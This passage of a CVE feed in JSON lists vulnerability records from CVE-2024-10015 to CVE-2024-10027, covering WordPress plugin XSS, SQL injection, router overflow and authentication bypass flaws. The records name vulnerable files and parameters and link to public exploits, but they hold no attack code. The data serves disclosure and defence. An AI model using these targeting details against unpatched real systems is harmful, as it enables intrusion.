"4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10015", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c1f55b51-cc93-4f45-9666-03740e147277?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c1f55b51-cc93-4f45-9666-03740e147277?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/convertcalculator/#developers", "name" : "https://wordpress.org/plugins/convertcalculator/#developers", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ConvertCalculator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' and 'type' parameters in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-16T04:15Z", "lastModifiedDate" : "2024-11-18T17:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10016", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/17988a66-5b48-4f57-96f8-74e539bc875e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/17988a66-5b48-4f57-96f8-74e539bc875e?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/file-upload-types/#developers", "name" : "https://wordpress.org/plugins/file-upload-types/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3174398%40file-upload-types&old=3119996%40file-upload-types&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3174398%40file-upload-types&old=3119996%40file-upload-types&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3174398/", "name" : "https://plugins.trac.wordpress.org/changeset/3174398/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The File Upload Types by WPForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-25T09:15Z", "lastModifiedDate" : "2024-10-25T12:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10017", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2731e8ed-27db-4d2b-b76f-8fdccfb2226a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2731e8ed-27db-4d2b-b76f-8fdccfb2226a?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/pjw-mime-config", "name" : "https://wordpress.org/plugins/pjw-mime-config", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The PJW Mime Config plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-16T04:15Z", "lastModifiedDate" : "2024-11-18T17:11Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10018", "ASSIGNER" : "security.tecno@tecno-mobile.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://security.tecno.com/SRC/blogdetail/323?lang=en_US", "name" : "https://security.tecno.com/SRC/blogdetail/323?lang=en_US", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.tecno.com/SRC/securityUpdates?type=SA", "name" : "https://security.tecno.com/SRC/securityUpdates?type=SA", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper permission control in the mobile application (com.transsion.aivoiceassistant) can lead to the launch of any unexported component." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-16T03:15Z", "lastModifiedDate" : "2024-10-16T18:35Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10019", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-23" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/3cf80890-2d8a-4fc7-8e0e-6d4bf648b3ea", "name" : "https://huntr.com/bounties/3cf80890-2d8a-4fc7-8e0e-6d4bf648b3ea", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability in the `start_app_server` function of parisneo/lollms-webui V12 (Strawberry) allows for path traversal and OS command injection. The function does not properly sanitize the `app_name` parameter, enabling an attacker to upload a malicious `server.py` file and execute arbitrary code by exploiting the path traversal vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lollms:lollms_web_ui:12:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 6.7, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 0.8, "impactScore" : 5.9 } }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-08T16:32Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1002", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setIpPortFilterRules-71c3f0a947e14b7f95fa19b7d6676994?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setIpPortFilterRules-71c3f0a947e14b7f95fa19b7d6676994?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252271", "name" : "https://vuldb.com/?ctiid.252271", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252271", "name" : "https://vuldb.com/?id.252271", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setIpPortFilterRules-71c3f0a947e14b7f95fa19b7d6676994?pvs=4", "name" : "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setIpPortFilterRules-71c3f0a947e14b7f95fa19b7d6676994?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252271", "name" : "https://vuldb.com/?id.252271", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252271", "name" : "https://vuldb.com/?ctiid.252271", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Totolink N200RE 9.3.5u.6139_B20201216. Affected by this vulnerability is the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ePort leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252271. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re_firmware:9.3.5u.6139_b20201216:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T14:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10020", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3177729/", "name" : "https://plugins.trac.wordpress.org/changeset/3177729/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6b1d212b-75fe-4285-9c22-62b040e5a36c?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6b1d212b-75fe-4285-9c22-62b040e5a36c?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Heateor Social Login WordPress plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.1.35. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, if they have access to the email and the user does not have an already-existing account for the service returning the token. An attacker cannot authenticate as an administrator by default, but these accounts are also at risk if authentication for administrators has explicitly been allowed via the social login." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:heateor:social_login:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.1.36", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-06T07:15Z", "lastModifiedDate" : "2024-11-08T21:19Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10021", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/439f2af836c2c7d6075ba9de2e1169da", "name" : "https://gist.github.com/higordiego/439f2af836c2c7d6075ba9de2e1169da", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280556", "name" : "VDB-280556 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280556", "name" : "VDB-280556 | code-projects Pharmacy Management System manage_purchase.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.424334", "name" : "Submit #424334 | code-projects Pharmacy Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /php/manage_purchase.php?action=search&tag=VOUCHER_NUMBER. The manipulation of the argument text leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-16T12:15Z", "lastModifiedDate" : "2024-10-21T13:13Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10022", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/2bd0a94e480906a60ce83b8a4ec26957", "name" : "https://gist.github.com/higordiego/2bd0a94e480906a60ce83b8a4ec26957", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280557", "name" : "VDB-280557 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280557", "name" : "VDB-280557 | code-projects Pharmacy Management System manage_supplier.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.424337", "name" : "Submit #424337 | code-projects Pharmacy Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in code-projects Pharmacy Management System 1.0. This affects an unknown part of the file /php/manage_supplier.php?action=search. The manipulation of the argument text leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-16T12:15Z", "lastModifiedDate" : "2024-10-21T13:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10023", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/01a35a20a4e20e937d384b677c000921", "name" : "https://gist.github.com/higordiego/01a35a20a4e20e937d384b677c000921", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280558", "name" : "VDB-280558 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280558", "name" : "VDB-280558 | code-projects Pharmacy Management System add_new_medicine.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.424483", "name" : "Submit #424483 | code-projects Pharmacy Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in code-projects Pharmacy Management System 1.0. This vulnerability affects unknown code of the file /php/add_new_medicine.php. The manipulation of the argument name/packing/generic_name/suppliers_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-16T13:15Z", "lastModifiedDate" : "2024-10-21T13:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10024", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://gist.github.com/higordiego/b0083f7f12dee245c2fbe7102e31d9a4", "name" : "https://gist.github.com/higordiego/b0083f7f12dee245c2fbe7102e31d9a4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280559", "name" : "VDB-280559 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280559", "name" : "VDB-280559 | code-projects Pharmacy Management System manage_medicine_stock.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.424529", "name" : "Submit #424529 | code-projects Pharmacy Management System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in code-projects Pharmacy Management System 1.0. This issue affects some unknown processing of the file /php/manage_medicine_stock.php. The manipulation of the argument name/packing/generic_name/suppliers_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:pharmacy_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-16T13:15Z", "lastModifiedDate" : "2024-10-21T13:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10025", "ASSIGNER" : "psirt@sick.de" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://cdn.sick.com/media/docs/1/11/411/Special_information_CYBERSECURITY_BY_SICK_en_IM0084411.PDF", "name" : "https://cdn.sick.com/media/docs/1/11/411/Special_information_CYBERSECURITY_BY_SICK_en_IM0084411.PDF", "refsource" : "", "tags" : [ ] }, { "url" : "https://sick.com/psirt", "name" : "https://sick.com/psirt", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "name" : "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.first.org/cvss/calculator/3.1", "name" : "https://www.first.org/cvss/calculator/3.1", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.sick.com/.well-known/csaf/white/2024/sca-2024-0003.json", "name" : "https://www.sick.com/.well-known/csaf/white/2024/sca-2024-0003.json", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.sick.com/.well-known/csaf/white/2024/sca-2024-0003.pdf", "name" : "https://www.sick.com/.well-known/csaf/white/2024/sca-2024-0003.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability in the .sdd file allows an attacker to read default passwords stored in plain text within the code. By exploiting these plaintext credentials, an attacker can log into affected SICK products as an “Authorized Client” if the customer has not changed the default password." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-17T10:15Z", "lastModifiedDate" : "2024-10-18T12:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10026", "ASSIGNER" : "security@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-326" }, { "lang" : "en", "value" : "CWE-335" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/google/gvisor/commit/83f75082e5b03fafca9201d9d9939028f712b0b2", "name" : "https://github.com/google/gvisor/commit/83f75082e5b03fafca9201d9d9939028f712b0b2", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/google/gvisor/commit/e54bfde79278cafadedbf73c68ee10cb5982f2af", "name" : "https://github.com/google/gvisor/commit/e54bfde79278cafadedbf73c68ee10cb5982f2af", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/google/gvisor/commit/f956b5ac17ae1f60a4d21999b59ba18c55f86d56", "name" : "https://github.com/google/gvisor/commit/f956b5ac17ae1f60a4d21999b59ba18c55f86d56", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.ndss-symposium.org/wp-content/uploads/2025-122-paper.pdf", "name" : "https://www.ndss-symposium.org/wp-content/uploads/2025-122-paper.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "Technical Description" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A weak hashing algorithm and small sizes of seeds/secrets in Google's gVisor allowed for a remote attacker to calculate a local IP address and a per-boot identifier that could aid in tracking of a device in certain circumstances." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:gvisor:*:*:*:*:*:*:*:*", "versionEndExcluding" : "20231030.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:gvisor:*:*:*:*:*:*:*:*", "versionStartIncluding" : "20231106.0", "versionEndExcluding" : "20231204.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2025-01-30T20:15Z", "lastModifiedDate" : "2025-07-31T18:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10027", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/a94c7b64-720a-47f1-a74a-691c3a9ed3a1/", "name" : "https://wpscan.com/vulnerability/a94c7b64-720a-47f1-a74a-691c3a9ed3a1/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Booking Calendar WordPress plugin before 10.6.3 does not sanitise and escape some of its Widgets settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpbookingcalendar:wp_booking_calendar:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : 